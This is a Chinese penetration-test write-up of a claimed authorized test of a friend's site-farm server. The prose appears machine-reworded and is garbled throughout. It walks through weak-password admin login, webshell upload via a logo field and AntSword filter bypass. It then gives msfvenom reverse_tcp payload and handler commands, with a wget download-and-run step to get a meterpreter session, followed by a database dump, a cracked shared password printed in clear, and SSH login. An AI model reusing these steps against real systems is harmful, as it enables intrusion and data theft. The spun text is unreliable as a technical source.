申明：文中仅限技术讨论与共享，禁止用以非法途径。若阅读者因而做出一切伤害网络信息安全个人行为后果很严重，与本号及创作者不相干。

文中涉及到知识要点实际操作训练：DoraBox之文档上传 （根据DoraBox射击场系列产品冲关训练，掌握文档上传系统漏洞的基本知识及怎样开展绕开上传故意文档。）

一、

前几天我一个盆友发来来一个连接，说他做的站提前准备发布，跟我说是否可以使做下检测，即然是盆友，那毫无疑问责无旁贷，准备开始搞事。

二、

1、先打开网页访问一下，发觉立即自动跳转到登陆页面，以下：

简易了尝试了下弱口令、万能密码和登陆框xss，发觉文本框对键入內容干了严苛的过虑，非法字符一概不允许，坚决舍弃。

2、简易扫描仪了一下比较敏感文件目录，发觉一个/adminx，果真这类开放注册的站都是会给管理人员出示一个专业的登录入口

(忽视这一 1.zip，那是我装包整站源码时留有的

尝试工程爆破，弱口令一波带去，进到后台管理，赶快把喜报汇报朋友，使他“意外惊喜”一下

3、找寻上传点

进到后台管理以后找寻上传点，发觉系统配置上有改动网站logo的作用，先传个php小龙试一下水

我现场就惊了，你后台登录框过虑那麼严苛結果你这上传点就这就这？？好赖做一个当地校检啊，你让burpsuite情面往哪搁？

4、联接shell尝试提权

传了马以后应用蚁剑联接，最先便是查询服务器信息内容，这儿有一个小插曲，开启虚似终端设备以后不管实行什么命令，回到結果全是 ret=127

应该是服务器上有哪些防护软件干了过虑，应用蚁剑内置的软件开展bypass

取得成功绕开

但是蚁剑的这一绕开联接不太平稳，并且速率也比较慢，因此揣摩着创建一个meterpreter对话尝试提权。

5、创建meterpreter 对话

在云服务器上应用msfvenom 转化成一个侧门：

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=服务器ip LPORT=监视端口号 -f elf > shell.elf

随后在服务器设定一个监视对话：

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp

set LHOST 服务器ip

set LPORT 监视端口号

run

在服务器上应用python创建一个简易的http服务项目：

python3 -m http.server

在总体目标服务器应用wget免费下载侧门文档并实行，取得成功获得meterpreter 对话

6、尝试提权遇阻

因为总体目标服务器运作的是 CentOS 8.0，内核版本为 Linux 4.18.0，且我获得到的仅为一个低管理权限的shell，要想完成提权是难以的，在明知道毫无疑问不成功的状况下我还是尝试了脏牛等全部的我手里可用的提权exp，均宣布不成功，也是预料之中的事。

7、柳暗花明又一村

提权未果以后，我逐渐滚动服务器上的各种各样文档，随后发觉了了不得的案件线索，老老实实它是个站群系统啊

随后我在每一个站的环境变量上都获得了她们相匹配的数据库查询及其数据库查询账户密码，看来应该是随机生成的，不好像会作为root客户登陆密码的通用性登陆密码，如下图：

因此我上传了一个脱裤马，获得到全部的数据库查询sql文件，尝试浏览全部的数据信息，以寻找一个很有可能的通用性登陆密码，想不到还真让我找到了，在好多个采集站和开卡站的库中，我找到了以下同样的md5值：

md5解密后結果为：vip886.A

尝试ssh连接服务器，取得成功

到此渗入完毕。

8、小结

本次渗入没有什么科技含量，可是足够表明出弱口令及其通用性登陆密码针对安全性的伤害有多大，此外上传作用的解决也是很重要的，一丁点安全防护也没有的上传点此是真头一回见。

系统漏洞汇报早已交到我朋友啦，想不到也有小钱钱拿，高兴。